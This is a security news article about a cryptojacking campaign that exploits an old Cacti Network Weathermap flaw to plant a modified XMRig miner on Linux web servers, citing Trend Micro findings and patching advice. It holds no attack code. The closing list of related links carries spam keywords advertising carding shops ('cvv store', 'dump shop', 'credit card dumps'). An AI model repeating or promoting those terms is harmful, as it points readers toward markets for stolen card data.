Guess what the favorite tool of hackers is when they want to infect Linux servers with crypto mining malware. It’s a 5-year-old security vulnerability that is being exploited in the cyprojacking campaign. The altered XMRig tool is the miner, which is legitimate and open source Monero miner.
A flaw that was discovered in 2013 in Network Weathermap plug-in, this tool was basically used by admin to evaluate network activity. The latest use of crypto mining was discovered by the researchers from Trend Micro, and they still believe this campaign is still active.
The key targets of this campaign are publicly accessible x86-64 Linux web servers, while the scope of the attack is not limited to any single destination since webservers across the globe are being targeted. United States, Japan, Taiwan, India, and China are some of the places identified as the top targets.
One wonders that such a critical flaw hasn’t been patched all this while, despite the availability of the patch for the last five years. Nevertheless, hackers are still making merry using this flaw for mining cryptocurrency. The vulnerability allows attackers to modify the code to install crypto-miner on the machine. The process is repeated after every three minutes to make sure the server restarts the mining process in case someone shuts down the system. It means the exploit is used for initiating a request for viewing the code on the webserver.
The attackers evade detection by instructing the XMRig tool to perform the actions discreetly. The CPU usage is modified by the Hacker simply by decreasing the percentage of power used to reduce the chances of detection.
The wallets have been used by the miners have also been identified by the researchers. One of the attackers received 320 Monero (approx. $75,000), said Trend Micro. It is worth noting that this is just a small proportion of what attackers are actually making through this campaign. Researchers opine that attackers must have mined $3 million in cryptocurrency.
To protect your computer from being used as a crypto mining tool, it is a good idea to keep the system patched. Those who run Cacti’s Network Weathermap plug-in must secure their data and keep it away from public servers. In the company’s official blog post, Trend Micro researchers noted:
“Data from Cacti should be properly kept internal to the environment. Having this data exposed represents a huge risk in terms of operational security. While this allows systems or network administrators to conveniently monitor their environments, it also does the same for threat actors.”
- Packet Fingerprinting with Wireshark and Detecting NMap Scans cvv sites, cvv store
- Кандидат в президенты США рассказал о своем хакерском прошлом cvvstore, valid cc shop
- Ransomware Attacks Targeting Unpatched EOL SonicWall SMA 100 VPN Appliances buy cvv, feshop cc
- European Banking Authority victim in Microsoft Exchange Server hack dump shop, buying cvv
- Starting an InfoSec Career – The Megamix – Chapter 6 cvv dump, credit card dumps
Recent CommentsNo comments to show.